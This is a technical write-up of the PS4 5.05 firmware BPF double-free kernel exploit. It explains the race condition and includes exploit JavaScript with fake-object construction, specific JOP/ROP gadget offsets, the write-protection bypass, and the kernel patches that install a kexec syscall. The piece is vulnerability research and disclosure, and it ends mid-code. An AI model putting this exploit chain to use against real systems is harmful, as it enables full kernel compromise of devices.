28 Jul 2018

PS4 5.05 BPF Double Free Kernel Exploit Writeup

Welcome to the 5.0x kernel exploit write-up. A few months ago, qwertyoruiopz discovered a kernel vulnerability in BPF and released an exploit for it, which crafted an out-of-bounds (OOB) write via a use-after-free (UAF) caused by a lack of proper locking. It was a fun bug, and a very trivial exploit. Sony then removed the write functionality from BPF, which patched that exploit. However, the core issue (the lack of locking) remained. A very similar race condition still exists in BPF past 4.55, which we will cover in detail below. The full source of the exploit can be found here.

Note: Similar to 4.55, this bug is interesting primarily for exploitation on the PS4, but it can also be used on other systems using the Berkeley Packet Filter VM if the attacker has sufficient permissions, so it’s been published under the “FreeBSD” folder.

If you find any mistakes or have suggestions to improve clarity on some points, either open an issue on this repo or reply to this tweet. Thanks :)

However, this bug is no longer accessible past 5.05 firmware, because the BPF driver has finally been blocked from unprivileged processes - WebKit can no longer open it.

Sony also introduced a new security mitigation in 5.0x firmwares to prevent the stack pointer from pointing into user space; we’ll go into more detail on this further down.

Assumptions

Some assumptions are made of the reader’s knowledge for the writeup. The avid reader should have a basic understanding of how memory allocators work - more specifically, how malloc() and free() allocate and deallocate memory respectively. They should also be aware that devices can be issued commands concurrently, as in, one command could be received while another one is being processed via threading. An understanding of C, x86, and exploitation basics is also very helpful, though not necessarily required.

Background

This section contains some helpful information for those who are newer to exploitation, or who are unfamiliar with device drivers or with exploit techniques such as heap spraying and race conditions. Feel free to skip to the “A Tale of Two Free()’s” section if you’re already familiar with this material.

What Are Drivers?

There are a few ways that applications can directly communicate with the operating system. One is system calls, of which there are over 600 in the PS4 kernel: ~500 come from FreeBSD and the rest are Sony-implemented. Another method is through something called “Device Drivers”. Drivers are typically used to bridge the gap between software and hardware devices (USB drives, keyboards/mice, webcams, etc) - though they can also be used just for software purposes.

There are a few operations that a userland application can perform on a driver (if it has sufficient permissions) to interface with it after opening it. In some instances, one can read from it, write to it, or in some cases, issue more complex commands to it via the ioctl() system call. The handlers for these commands are implemented in kernel space - this is important, because any bugs that could be exploited in an ioctl handler can be used as a privilege escalation straight to ring0 - typically the most privileged state.

Drivers are often the weaker points of an operating system for attackers, because sometimes these drivers are written by developers who don’t understand how the kernel works, or the drivers are older and thus not wise to newer attack methods.

The BPF Device Driver

If we take a look around inside of WebKit’s sandbox, we’ll find a /dev directory. While this may seem like the root device driver path, it’s a lie. Many of the drivers that the PS4 has are not exposed to this directory, but rather only ones that are needed for WebKit’s operation (for the most part). For some reason though, the BPF (aka the “Berkeley Packet Filter”) device is not only exposed to WebKit’s sandbox - WebKit also has the privileges to open the device as R/W. This is very odd, because on most systems this driver is root-only (and for good reason). If you want to read more about this, refer to my previous write-up on 4.55FW.

What Are Packet Filters?

Below is an excerpt from the 4.55 bpfwrite writeup.

Since the bug is directly in the filter system, it is important to know the basics of what packet filters are. Filters are essentially sets of pseudo-instructions that are parsed by bpf_filter() (and are run when packets are received). While the pseudo-instruction set is fairly minimal, it allows you to do things like perform basic arithmetic operations and copy values around inside its buffer. Breaking down the BPF VM in its entirety is far beyond the scope of this write-up; just know that the code produced by it is run in kernel mode - this is why read/write access to /dev/bpf should be privileged.

You can reference the opcodes that the BPF VM takes here.
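To make the idea of filter pseudo-instructions concrete, here is a minimal sketch of an interpreter for a tiny subset of classic BPF. The opcode values follow the classic BPF encoding, but the `insn` and `runFilter` helpers are hypothetical names for this illustration, and the real bpf_filter() supports far more (packet loads, jumps, scratch memory).

```javascript
// Toy model of a classic BPF filter program (not the kernel's bpf_filter()).
// An opcode is built by OR-ing a class with an operation and an operand source.
const BPF_LD = 0x00, BPF_ALU = 0x04, BPF_RET = 0x06; // instruction classes
const BPF_IMM = 0x00;                                 // load-immediate mode
const BPF_ADD = 0x00;                                 // ALU operation
const BPF_K = 0x00, BPF_A = 0x10;                     // constant vs. accumulator

// Mirrors the shape of struct bpf_insn: { code, jt, jf, k }.
function insn(code, k) {
  return { code, jt: 0, jf: 0, k: k >>> 0 };
}

// Hypothetical helper: interpret a program using only the subset above.
function runFilter(program) {
  let A = 0; // accumulator register
  for (const { code, k } of program) {
    switch (code) {
      case BPF_LD | BPF_IMM:          A = k; break;
      case BPF_ALU | BPF_ADD | BPF_K: A = (A + k) >>> 0; break;
      case BPF_RET | BPF_K:           return k;
      case BPF_RET | BPF_A:           return A;
      default: throw new Error("unsupported opcode 0x" + code.toString(16));
    }
  }
  throw new Error("program ended without a ret instruction");
}

// A one-instruction "accept everything" filter and a small arithmetic example.
const acceptAll = [insn(BPF_RET | BPF_K, 0xffffffff)];
const addTwo = [
  insn(BPF_LD | BPF_IMM, 40),
  insn(BPF_ALU | BPF_ADD | BPF_K, 2),
  insn(BPF_RET | BPF_A, 0),
];
```

A single `ret` instruction like `acceptAll` is roughly what a do-nothing filter looks like; the point is only that a filter is a small program the kernel executes on the caller's behalf.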

Race Conditions

Race conditions occur when two processes/threads try to access a shared resource at the same time without mutual exclusion. The problem was ultimately solved by introducing concepts such as the “mutex” or “lock”. The idea is when one thread/process tries to access a resource, it will first acquire a lock, access it, then unlock it once it’s finished. If another thread/process tries to access it while the other has the lock, it will wait until the other thread is finished. This works fairly well - when it’s used properly.

Locking is hard to get right, especially when you try to implement fine-grained locking for performance. One single instruction or line of code outside the locking window could introduce a race condition. Not all race conditions are exploitable, but some are (such as this one) - and they can give an attacker very powerful bugs to work with.

Heap Spraying

The process of heap spraying is fairly simple - allocate a bunch of memory and fill it with controlled data in a loop and pray your allocation doesn’t get stolen from underneath you. It’s a very useful technique when exploiting something such as a use-after-free(), as you can use it to get controlled data into your target object’s backing memory.

By extension, it’s useful to do this for a double free() as well, because once we have a stale reference, we can use a heap spray to control the data. Since the object will be marked “free”, the allocator will eventually provide us with control over this memory, even though something else is still using it. That is, unless something else has already stolen the pointer from you and corrupted it - then you’ll likely get a system crash, and that’s no fun. This is one factor that adds to the variance of exploits, and typically, the smaller the object, the more likely this is to happen.
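The spray-and-reclaim idea can be sketched with a toy fixed-size allocator. This is only a model under simplifying assumptions (one size class, a strictly LIFO free list, no other allocations competing); `ToyHeap` and its methods are made up for this example and do not reflect how the FreeBSD allocator is implemented.

```javascript
// Toy fixed-size allocator: a LIFO free list over numbered chunks.
class ToyHeap {
  constructor(chunks) {
    this.memory = new Array(chunks).fill("uninitialised");
    this.freeList = [];
    for (let i = chunks - 1; i >= 0; i--) this.freeList.push(i);
  }
  malloc(data) {
    if (this.freeList.length === 0) throw new Error("out of memory");
    const chunk = this.freeList.pop(); // most recently freed chunk comes back first
    this.memory[chunk] = data;
    return chunk;
  }
  free(chunk) {
    this.freeList.push(chunk);         // the old contents are left in place
  }
}

const sprayHeap = new ToyHeap(8);
const victim = sprayHeap.malloc("legitimate object");
sprayHeap.free(victim);                // `victim` is now a stale reference

// Spray: allocate repeatedly with attacker-controlled contents.
const sprayed = [];
for (let i = 0; i < 4; i++) sprayed.push(sprayHeap.malloc("attacker data"));

// Whoever still uses the stale reference now reads the sprayed contents.
console.log(sprayHeap.memory[victim]);
```

In this model the first spray allocation always lands on the freed chunk. On a real system other allocations can take it first, which is where the variance mentioned above comes from.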

A Tale of Two Free()’s

Via the ioctl() system call, a user can set a filter program on a given descriptor using commands such as BIOCSETWF. There are other commands to set other filters, however the write filter is the only one interesting to us for this writeup. An important part of the previous exploit was the power to free() an older filter once a new one has been allocated, via bpf_setf(), which is called directly by BIOCSETWF’s command handler. This allowed us to free() a filter while it was in use. This free() in itself is also a bug that can be exploited, and is leveraged in the newer exploit. Let’s take a look at bpf_setf() again.

src

static int bpf_setf(struct bpf_d *d, struct bpf_program *fp, u_long cmd)
{
    struct bpf_insn *fcode, *old;

    // ...

    if (cmd == BIOCSETWF) {
        old = d->bd_wfilter; // <----- THIS ISN'T LOCKED :)
        wfilter = 1;
    }

    // ...
    if (fp->bf_insns == NULL) {
        // ...

        BPFD_LOCK(d);

        // ...

        BPFD_UNLOCK(d);

        if (old != NULL)
            free((caddr_t)old, M_BPF);

        return (0);
    }

    // ...
}

We can see that there are variables on the stack to hold filter pointers, including one for the old filter which eventually gets free()’d. If the ioctl command is set to BIOCSETWF, the pointer from d->bd_wfilter is copied to the old stack variable.

Later on, we can see that they lock the BPF descriptor, and null the references to the filters. They lock the reference clearing, but what about the pointer of d->bd_wfilter being copied to the stack? As we’ve seen in previous exploits, multiple threads can run and use the same bpf_d object. If we were to race setting two filters in parallel, there’s a chance that both threads will copy the same pointer to their kernel stacks, eventually resulting in a double free as both pointers will be processed.

demonstration gif
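The interleaving that produces the double free can be replayed deterministically. The sketch below is a simplified model, not kernel code: the descriptor and the two “threads” are plain objects, the pointer values are made-up strings, and the two steps correspond to the unlocked read of d->bd_wfilter and the later free() in bpf_setf().

```javascript
// Deterministic replay of the racy interleaving in bpf_setf().
const freed = [];                                    // every pointer handed to free()
const descriptor = { bd_wfilter: "filter@0x1000" };  // shared bpf_d stand-in

// Step 1: copy the old filter pointer to the "stack" WITHOUT holding the lock.
function readOld(thread) {
  thread.old = descriptor.bd_wfilter;
}

// Step 2: swap the filter (the part that is locked), then free the old pointer.
function swapAndFree(thread, newFilter) {
  descriptor.bd_wfilter = newFilter;                 // BPFD_LOCK ... BPFD_UNLOCK
  if (thread.old !== null) freed.push(thread.old);   // free(old, M_BPF)
}

const t1 = { old: null };
const t2 = { old: null };

readOld(t1);                       // thread 1 reads the pointer
readOld(t2);                       // thread 2 reads the same pointer before the swap
swapAndFree(t1, "filter@0x2000");
swapAndFree(t2, "filter@0x3000");

console.log(freed);                // the same pointer appears twice
```

If both reads were performed while holding the lock, thread 2 would observe thread 1’s replacement filter instead, and each pointer would be freed exactly once.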

Poisoning the Allocator

With a double free() primitive, we have the ability to achieve memory corruption on the kernel heap by poisoning the memory allocator. This essentially allows us to create a targeted use-after-free() (UAF) on an object allocated post-corruption.
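As a rough illustration of what “poisoning” means here, consider a toy LIFO free list. This is a sketch under the assumption that a freed chunk is simply pushed onto a stack of free addresses; `toyFree` and `toyMalloc` are hypothetical helpers and the address is arbitrary.

```javascript
// Toy LIFO free list showing the effect of freeing the same chunk twice.
const freeChunks = [];                          // stack of free chunk addresses
const toyFree = (addr) => { freeChunks.push(addr); };
const toyMalloc = () => {
  if (freeChunks.length === 0) throw new Error("free list empty");
  return freeChunks.pop();
};

toyFree(0x1000);               // first free of the filter
toyFree(0x1000);               // second free from the racing thread

const objectA = toyMalloc();   // e.g. the next kernel object of this size
const objectB = toyMalloc();   // e.g. one of our heap spray allocations
```

Both allocations come back with the same address, so two unrelated owners now share one chunk. Writing through one of them corrupts the other, which is the targeted UAF described above.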

Corrupting knotes

Summary

Similar to 1.76, the target object used for this exploit was the knote object. The knote object is used to represent a kernel event in memory, and knotes are linked together in a singly linked list. kqueue objects represent the event queues that raise these events, and knote lists are managed by the kqueue they are in. Qwerty chose knote because of knote lists (called knlist), as they give us some degree of control over the size. Let’s take a look at the structure (macros have been omitted for brevity’s sake).

src

struct knote {
    SLIST_ENTRY(knote)      kn_link;                /* for kq */
    SLIST_ENTRY(knote)      kn_selnext;             /* for struct selinfo */

    struct                  knlist *kn_knlist;      /* f_attach populated */
    TAILQ_ENTRY(knote)      kn_tqe;
    struct                  kqueue *kn_kq;          /* which queue we are on */
    struct                  kevent kn_kevent;
    int                     kn_status;              /* protected by kq lock */
    int                     kn_sfflags;             /* saved filter flags */
    intptr_t                kn_sdata;               /* saved data field */

    union {
        struct              file *p_fp;             /* file data pointer */
        struct              proc *p_proc;           /* proc pointer */
        struct              aiocblist *p_aio;       /* AIO job pointer */
        struct              aioliojob *p_lio;       /* LIO job pointer */ 
    } kn_ptr;

    struct                  filterops *kn_fop;      // <--- Of interest as an attacker, offset: 0x68
    void                    *kn_hook;
    int                     kn_hookid;
};

There’s an interesting field there, struct filterops *kn_fop at offset 0x68. This is essentially a table of function pointers that is referenced when something happens with the event, such as an attach or detach. The f_detach function pointer will be dereferenced and called when the kqueue and by extension the knote is being destroyed.
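The 0x68 offset can be sanity-checked by laying out the structure by hand. The sketch below assumes an LP64 target (8-byte pointers, 4-byte int), natural alignment, and a 32-byte struct kevent; the `layout` helper and the field table are written for this example only.

```javascript
// Recompute knote field offsets under the assumptions stated above.
const PTR = 8, INT = 4;
const KEVENT = 32; // ident(8) + filter(2) + flags(2) + fflags(4) + data(8) + udata(8)

// [name, size in bytes, alignment in bytes]
const knoteFields = [
  ["kn_link",    PTR,     8], // SLIST_ENTRY: one pointer
  ["kn_selnext", PTR,     8], // SLIST_ENTRY: one pointer
  ["kn_knlist",  PTR,     8],
  ["kn_tqe",     2 * PTR, 8], // TAILQ_ENTRY: two pointers
  ["kn_kq",      PTR,     8],
  ["kn_kevent",  KEVENT,  8],
  ["kn_status",  INT,     4],
  ["kn_sfflags", INT,     4],
  ["kn_sdata",   PTR,     8],
  ["kn_ptr",     PTR,     8], // union of pointers
  ["kn_fop",     PTR,     8],
];

function layout(fields) {
  const offsets = {};
  let cursor = 0;
  for (const [name, size, align] of fields) {
    cursor = Math.ceil(cursor / align) * align; // pad up to the field's alignment
    offsets[name] = cursor;
    cursor += size;
  }
  return offsets;
}

const knoteOffsets = layout(knoteFields);
console.log("kn_status @ 0x" + knoteOffsets.kn_status.toString(16));
console.log("kn_fop    @ 0x" + knoteOffsets.kn_fop.toString(16));
```

Under these assumptions kn_status lands at 0x50 and kn_fop at 0x68, matching the offsets used when the fake knote is built later on.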

src

struct filterops {
    int     f_isfd;
    int     (*f_attach)(struct knote *kn);
    void    (*f_detach)(struct knote *kn);
    int     (*f_event)(struct knote *kn, long hint);
    void    (*f_touch)(struct knote *kn, struct kevent *kev, u_long type);
};

By corrupting the f_detach function pointer, hijacking of the instruction pointer and thus arbitrary code execution can be achieved when the object is destroyed via the destruction of the corrupted kqueue.

Exploit Overview

Our exploit strategy is targeting a UAF on the knote object to hijack the instruction pointer. Let’s break down the steps/stages for successful exploitation.

1) Open BPF descriptors, set up one NOP filter and one filter for heap spraying
2) Set up the fake knote object in WebKit’s heap for JOP
3) Set up the kernel ROP chain
4) Start thread one
5) Start thread two

Thread 1 will do the following actions:

1) Create a kqueue via sys_kqueue()
2) Set a filter on the device in an attempt to poison the allocator
3) Trigger a kevent
4) Perform a heap spray in an attempt to achieve memory corruption
5) Close the kqueue (attempt to achieve code execution)

Thread 2 will simply continuously attempt to set a write filter.

A Poor Man’s SMAP

At some point in 5.0x, it seems Sony added some mitigation into the scheduler to check the stack pointer against userland addresses when running in kernel context, similar to the increasingly common “Supervisor Mode Access Prevention” (SMAP) mitigation found on modern systems. This turned an otherwise fairly trivial exploit into some complex kernel memory manipulation to run a kernel ROP (kROP) chain. To my knowledge this hasn’t been investigated very much, but attempting a simple stack pivot like we’ve done in previous exploits into userland memory will crash the kernel.

To avoid this, we need to get our ROP chain into kernel memory. To do this, qwerty decided to go with the method he used on the iPhone 7 - essentially using JOP to push a bunch of stack frames onto the kernel stack, and memcpy()’ing the chain into the space at RSP.

You can find a detailed annotation of the exploit here to assist in understanding it, as it does get quite complex.

JOP Explained

Software engineers have started getting wise to stack pivot techniques, and preventing the attacker from pivoting the stack into user-controlled memory is a pretty decent counter-measure. However, like everything, it is bypassable, and JOP (jump oriented programming) is one way to do it. You could use JOP to implement a full chain, or use it as a method of getting to ROP by getting your ROP chain into kernel memory. The latter is preferred, because implementing logic in JOP (while possible) can be a nightmare.

ROP vs. JOP

Return Oriented Programming (ROP) is essentially the process of creating a fake stack, pushing the addresses of gadgets to it, and pivoting RSP to it. Your chain of gadgets is then executed like a real callstack, and every time the ret instruction is hit, the next gadget in the chain is run.

Jump Oriented Programming (JOP) works a bit differently. Instead of ending your gadgets with a ret instruction, you end your gadgets with a jmp instruction. As long as you control the destination (maybe there’s a register you can influence the value of), you can chain it with other gadgets, without the need of using a fake stack. For instance, if you control the value of rax, your gadget can end with jmp rax. By setting the value of rax to the address of the next gadget, you can chain them.

With JOP you generally have to get more creative, because you’re even more limited on potential gadgets - this is why implementing full chains in JOP is not preferred.

src
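The difference in control flow can be sketched with a toy model. Gadgets here are JavaScript functions keyed by made-up addresses, and the `cpu` and `mem` objects are stand-ins invented for this example; nothing below corresponds to real WebKit or kernel gadgets.

```javascript
const trace = [];

// ROP: every gadget ends in `ret`, so the next gadget address comes off a fake stack.
const ropGadgets = {
  0x100: () => trace.push("A"),
  0x200: () => trace.push("B"),
};
function runRop(fakeStack) {
  for (const address of fakeStack) ropGadgets[address]();
}

// JOP: every gadget ends in `jmp rax`, so each gadget must itself leave the next
// target in a register we influence. Here it is loaded from memory through rdi.
const jopGadgets = {
  0x300: (cpu, mem) => { trace.push("C"); cpu.rax = mem[cpu.rdi]; cpu.rdi += 8; },
  0x400: (cpu) => { trace.push("D"); cpu.rax = 0; }, // 0 stops this toy model
};
function runJop(entry, cpu, mem) {
  cpu.rax = entry;
  while (cpu.rax !== 0) jopGadgets[cpu.rax](cpu, mem);
}

runRop([0x100, 0x200, 0x100]);
runJop(0x300, { rax: 0, rdi: 0x1000 }, { 0x1000: 0x300, 0x1008: 0x400 });
console.log(trace.join(" "));
```

In the ROP half the order of execution lives entirely in the fake stack. In the JOP half it lives in whatever memory the gadgets read their next target from, which is why controlling a register such as rdi matters so much in the sections that follow.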

Faking a knote

Now that we’ve covered the basics of what the exploit is and the basics of JOP, we’ll walk through the process of exploiting the bug. The first thing we need to do is set up a fake knote object to spray the heap with. Luckily, faking this object is easy: there’s no need to fake a bunch of members for stability, we only need to fake a few members along with kn_fop, our target member. The ctxp buffer is used to set up our fake knote.

var ctxp  = p.malloc32(0x2000);    // ctxp = knote
p.write8(ctxp.add32(0), ctxp2);    // 0x00 = kn_link - not important for kqueue per se, but for the JOP gadget
p.write8(ctxp.add32(0x50), 0);     // 0x50 = kn_status = 0 (clear flags so detach is called)
p.write8(ctxp.add32(0x68), ctxp1); // 0x68 = kn_fop

Notice that we’ve set kn_fop to ctxp1 - this is the buffer for the fake filterops function table. The only thing we need to fake in this table is kn_fop->f_detach(), because this is the only function that will be called on kqueue destruction.

var ctxp1 = p.malloc32(0x2000);     // ctxp1 = knote->kn_fop
p.write8(ctxp1.add32(0x10), offsetToWebKit(0x12A19CD)); // JOP gadget

As you can see, this is where we achieve arbitrary code execution, and we’re directing RIP to 0x12A19CD in WebKit. Here’s an x86 snippet of the relevant code for kqueue_close() - where control of the instruction pointer is achieved.

src

; Note: R14 = ctxp
seg000:FFFFFFFF89D29861                 test    byte ptr [r14+50h], 8      ; we set ctxp+0x50 to 0, so we're good
seg000:FFFFFFFF89D29866                 jnz     short loc_FFFFFFFF89D29872 ; irrelevant
seg000:FFFFFFFF89D29868                 mov     rax, [r14+68h]             ; r14 + 0x68 = ctxp1
seg000:FFFFFFFF89D2986C                 mov     rdi, r14                   ; rdi = r14 = ctxp, and [ctxp + 0x00] = ctxp2
seg000:FFFFFFFF89D2986F                 call    qword ptr [rax+10h]        ; JOP gadget

Also notice that we control the rdi register here via the r14 register. Under normal circumstances, the knote object kn is loaded into rdi as it’s the first argument to kn->kn_fop->f_detach() - however because we have corruption on the knote - we can not only control where we jump to, but also the arguments. This is important for JOP, because the next jump in the first JOP gadget requires us to have control of the RDI register.
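To tie the fake knote to the disassembly, the dispatch can be replayed over a small fake memory map. This is a sketch only: the buffer addresses are arbitrary, `JOP_GADGET` uses the raw WebKit offset rather than a rebased address, and `write8`/`read8` are local helpers for this model rather than the exploit’s `p.write8`.

```javascript
// Toy replay of the kqueue_close() snippet over a fake memory map.
// Only the offsets (0x50, 0x68, 0x10) are taken from the write-up.
const fakeMem = new Map();
const write8 = (addr, value) => { fakeMem.set(addr, value); };
const read8 = (addr) => (fakeMem.has(addr) ? fakeMem.get(addr) : 0);

const CTXP = 0x10000, CTXP1 = 0x20000, CTXP2 = 0x30000;
const JOP_GADGET = 0x12a19cd;

write8(CTXP + 0x00, CTXP2);        // kn_link, consumed later by the JOP gadget
write8(CTXP + 0x50, 0);            // kn_status with the tested bit clear
write8(CTXP + 0x68, CTXP1);        // kn_fop -> fake filterops table
write8(CTXP1 + 0x10, JOP_GADGET);  // f_detach slot

function detachDispatch(r14) {
  if (read8(r14 + 0x50) & 8) return null;   // test byte ptr [r14+50h], 8 / jnz
  const rax = read8(r14 + 0x68);            // mov rax, [r14+68h]
  const rdi = r14;                          // mov rdi, r14
  return { rip: read8(rax + 0x10), rdi };   // call qword ptr [rax+10h]
}

const hijack = detachDispatch(CTXP);
console.log(hijack.rip.toString(16), hijack.rdi.toString(16));
```

The model ends with the instruction pointer at the chosen gadget and rdi pointing at the fake knote, whose first qword is ctxp2. That pairing is what the first JOP gadget relies on.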

Code Execution

Creating space on the kstack

To push some space on the stack, we can use a JOP chain. We’ll use the variable stackshift_from_retaddr to track how much we’ve pushed on the stack. First we’ll run a function prologue, which will subtract from RSP, creating space for us to put our ROP chain into. This function prologue is our first JOP gadget at 0x12A19CD, which we set up previously in our fake knote that we sprayed.

seg000:00000000012A19CD                 sub     rsp, 58h
seg000:00000000012A19D1                 mov     [rbp-2Ch], edx
seg000:00000000012A19D4                 mov     r13, rdi
seg000:00000000012A19D7                 mov     r15, rsi
seg000:00000000012A19DA                 mov     rax, [r13+0]
seg000:00000000012A19DE                 call    qword ptr [rax+7D0h]       ; implicitly subtracts 0x8 from rsp

At this point, RSP is 0x60 bytes (0x58 from the sub plus 0x8 from the call) below where it was on entry to the gadget. Now remember, for JOP to work, we need to be able to control where code jumps next, which means we have to control rax. Luckily, we can see rax is loaded from r13+0, and r13 is set from rdi. As detailed above, we control rdi via the corrupted knote object. If we look at the previous section where the JOP gadget is called from the kernel, rdi holds ctxp, and we wrote ctxp2 to ctxp + 0x00, so rax is loaded with ctxp2. The next gadget will be called through the pointer at ctxp2 + 0x7D0, which we will set to 0x6EF4E5.

p.write8(ctxp2.add32(0x7d0), offsetToWebKit(0x6EF4E5));

seg000:00000000006EF4E5                 mov     rdi, [rdi+10h]
seg000:00000000006EF4E9                 jmp     qword ptr [rax]

This gadget will allow us to set rdi to a new value, and jump to the address stored at [rax], where rax still holds the address of ctxp2. Notice that this gadget allows us to loop, because we can write the address of the first gadget to ctxp2, and control what the first gadget works with next via the value loaded from rdi + 0x10.

var iterbase = ctxp2;

for (var i = 0; i < 0xf; i++) {                                       // loop 15 times
    p.write8(iterbase, offsetToWebKit(0x12A19CD));                    // first JOP gadget
    stackshift_from_retaddr += 8;
    p.write8(iterbase.add32(0x7d0 + 0x20), offsetToWebKit(0x6EF4E5)); // second JOP gadget
    p.write8(iterbase.add32(8), iterbase.add32(0x20));
    p.write8(iterbase.add32(0x18), iterbase.add32(0x20 + 8));
    iterbase = iterbase.add32(0x20);                                  // setup next loop
}

Preparing memcpy call

Fundamentals

Now that we’ve created space on the stack, we want to copy our kernel ROP chain into it to get executed. Let’s take a look at memcpy()’s function signature:

void *memcpy(void *destination, const void *source, size_t num);

As defined in the System V AMD64 ABI (Application Binary Interface), which FreeBSD uses on x64, the following registers are used to pass arguments to functions:

rdi - first argument
rsi - second argument
rdx - third argument
rcx - fourth argument
r8 - fifth argument
r9 - sixth argument
[stack] - seventh and later arguments

Therefore, the following registers are interesting to us for this memcpy call:

rdi (memory destination pointer)
rsi (memory source pointer)
rdx (size in bytes)

Setting Size

The first thing we’ll do is load RDX for the size. We can do this via another JOP gadget in WebKit at 0x15CA41B.

seg000:00000000015CA41B                 mov     rdx, [rdi+0B0h]
seg000:00000000015CA422                 call    qword ptr [rdi+70h]

We can write relative to RDI via the rdibase variable. By adding our shift plus 0x28 (offset for where we’re writing on the stack), we can load RDX with our chain length.

Setting Source

Next we’ll load the source pointer in RSI. We want this to point to where we’re writing our kernel ROP chain in userland. Similar to when we set the size, we’ll again look for a JOP gadget that can set RSI from memory relative to RDI. WebKit at 0x1284834 does the trick.

seg000:0000000001284834                 mov     rsi, [rdi+8]
seg000:0000000001284838                 mov     rdi, [rdi+18h]
seg000:000000000128483C                 mov     rax, [rdi]
seg000:000000000128483F                 call    qword ptr [rax+30h]

Setting Destination

Finally, we need to set up RDI so that it points to all of our fake stack frames that we pushed on the kernel stack. This turns out to be at RBP (base pointer) - 0x28. We can use another JOP gadget at 0x272961.

seg000:0000000000272961                 lea     rdi, [rbp-28h]
seg000:0000000000272965                 call    qword ptr [rax+40h]

Calling Memcpy

Now that the arguments are set up, we need to call memcpy(). Notice from our last JOP gadget that the next place we jump to is determined by [rax + 0x40]. This is where we want to write the address of memcpy() from userland. We’ll skip the function prologue and optimizations to avoid side-effects produced by our previous JOP gadgets.

p.write8(raxbase.add32(0x40), memcpy.add32(0xC2 - 0x90)); // skip prolog covering side effecting branch and skipping optimizations
var topofchain = stackshift_from_retaddr + 0x28;
p.write8(rdibase.add32(0xB0), topofchain);

Exploit Debugging (Kind Of)

Summary

It was suggested to me that I should include a section containing some details on complications that occurred. We’ve already detailed one of them, being the SMAP-like implementation, however another was the lack of debugging. At this point in time, we didn’t have a kernel debugging framework set up for working with the PS4. We did however have the ability to patch the kernel to enable UART and “verbose panic” information if we had an existing kernel exploit working. Of course though, once the system reboots, we no longer have access to UART or verbose panic info even if we did before.

Fatal Traps

Panic information that’s printed to the klog/UART can be a very helpful tool for debugging exploits (which is probably why Sony has it disabled in the first place). Below is an example of a standard page fault panic from klog:

Fatal trap 12: page fault while in kernel mode
cpuid = 0; apic id = 01
fault virtual address   = 0xffffde1704254000
fault code              = supervisor read instruction, protection violation
instruction pointer     = 0x20:0xffffde1704254000
stack pointer           = 0x28:0xffffff807119b220
frame pointer           = 0x28:0xffffff807119b2b0
code segment            = base 0x0, limit 0xfffff, type 0x1b
                        = DPL 0, pres 1, long 1, def32 0, gran 1
processor eflags        = interrupt enabled, resume, IOPL = 0
current process         = 87 (infloopThr)

As you can see, some information here is extremely useful, especially the virtual address and the instruction pointer.

Complications

This information is fantastic when the system actually gives it to us. However, there are some cases where the system won’t. Often this seems to be because the crash happens in a critical section, such as inside free() directly. For more information on critical sections, see Critical Sections.

Other times, the reason we don’t get this information is unknown. If the panic information is unobtainable for us because we either don’t have an existing exploit or the information just won’t get printed to the klog, other tricks must be used, such as using infloop gadgets and other “hacky” exploit debugging techniques.

Patching the Kernel

Disabling Write Protection

Now that we have the ability to run kernel ROP chains due to our stack manipulation sorcery described in the last section, we can apply kernel patches after we disable kernel write protection via the cr0 register. We can do this by clearing the write-protection (WP) bit, which is bit 16.

src cr0 table

krop.push(window.gadgets["pop rsi"]);
krop.push(new int64(0xFFFEFFFF, 0xFFFFFFFF)); // AND mask that clears the WP bit (bit 16)
krop.push(window.gadgets["and rax, rsi"]);
krop.push(window.gadgets["mov rdx, rax"]);
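The constant in the chain can be derived rather than memorised. The sketch below uses BigInt to build the 64-bit AND mask and split it into two 32-bit halves, assuming the int64 constructor takes the low half first (which the constant above suggests). The `cr0Before` value is an illustrative example, not a value read from a PS4.

```javascript
// Derive the AND mask that clears CR0.WP (bit 16).
const CR0_WP = 1n << 16n;
const wpMask = ~CR0_WP & 0xFFFFFFFFFFFFFFFFn;   // all ones except bit 16

const maskLow = Number(wpMask & 0xFFFFFFFFn);    // low 32 bits of the mask
const maskHigh = Number(wpMask >> 32n);          // high 32 bits of the mask

// Illustrative CR0 value with PG, AM, WP, NE, ET, MP and PE set.
const cr0Before = 0x80050033n;
const cr0After = cr0Before & wpMask;             // same value with WP cleared

console.log(maskLow.toString(16), maskHigh.toString(16), cr0After.toString(16));
```

Because the mask is applied with AND, every other CR0 bit is preserved and only write protection is dropped, so the kernel’s read-only pages become writable from ring0.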

Installing a Syscall (Kexec)

For brevity’s sake, I won’t cover all the patches in detail, however here’s a brief recap of the patches made in the ROP chain.

sys_setuid syscall       - remove permission check
sys_mmap syscall         - allow RWX mapping
amd64_syscall            - syscall instruction allowed anywhere
sys_dynlib_dlsym syscall - allow dynamic resolving from anywhere

The main goal of the chain is to install our own system call called kexec. This will allow us to execute arbitrary code in kernel mode easily from any application, no matter the privileges.

sys_kexec(void *code, void *uap);

Code such as jailbreaking and HEN is run via kexec. Installing it is fairly easy, we just have to add an entry into sysent.

src

struct sysent {                         /* system call table */
    int sy_narg;                        /* number of arguments */
    sy_call_t *sy_call;                 /* implementing function */
    au_event_t sy_auevent;              /* audit event associated with syscall */
    systrace_args_func_t sy_systrace_args_func;
                                        /* optional argument conversion function. */
    u_int32_t sy_entry;                 /* DTrace entry ID for systrace. */
    u_int32_t sy_return;                /* DTrace return ID for systrace. */
    u_int32_t sy_flags;                 /* General flags for system calls. */
    u_int32_t sy_thrcnt;
};

By setting sy_call to a jmp qword ptr [rsi] gadget (which can be found in the kernel at offset 0x13460), sy_narg to 2, and the final qword of the entry to 100000000h (which, going by the structure above, leaves sy_flags at 0 and places SY_THR_STATIC in sy_thrcnt), we can successfully insert a custom system call that executes code in ring0.

seg000:FFFFFFFF8AC38820                 dq 2                    ; Syscall #11
seg000:FFFFFFFF8AC38828                 dq 0FFFFFFFF89BCF460h
seg000:FFFFFFFF8AC38830                 dq 0
seg000:FFFFFFFF8AC38838                 dq 0
seg000:FFFFFFFF8AC38840                 dq 0
seg000:FFFFFFFF8AC38848                 dq 100000000h
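The dump can be mapped back onto struct sysent field by field. The sketch below assumes little-endian x86-64 with natural alignment (so sy_narg and sy_auevent are each followed by padding up to the next 8-byte boundary); those offsets are an assumption of this example, not something stated in the dump itself.

```javascript
// Decode the six qwords of the syscall #11 entry into struct sysent fields.
const dump = [0x2n, 0xFFFFFFFF89BCF460n, 0x0n, 0x0n, 0x0n, 0x100000000n];

const lo32 = (q) => Number(q & 0xFFFFFFFFn);  // lower dword of a qword
const hi32 = (q) => Number(q >> 32n);         // upper dword of a qword

const entry = {
  sy_narg:               lo32(dump[0]),             // offset 0x00
  sy_call:               dump[1],                   // offset 0x08
  sy_auevent:            Number(dump[2] & 0xFFFFn), // offset 0x10
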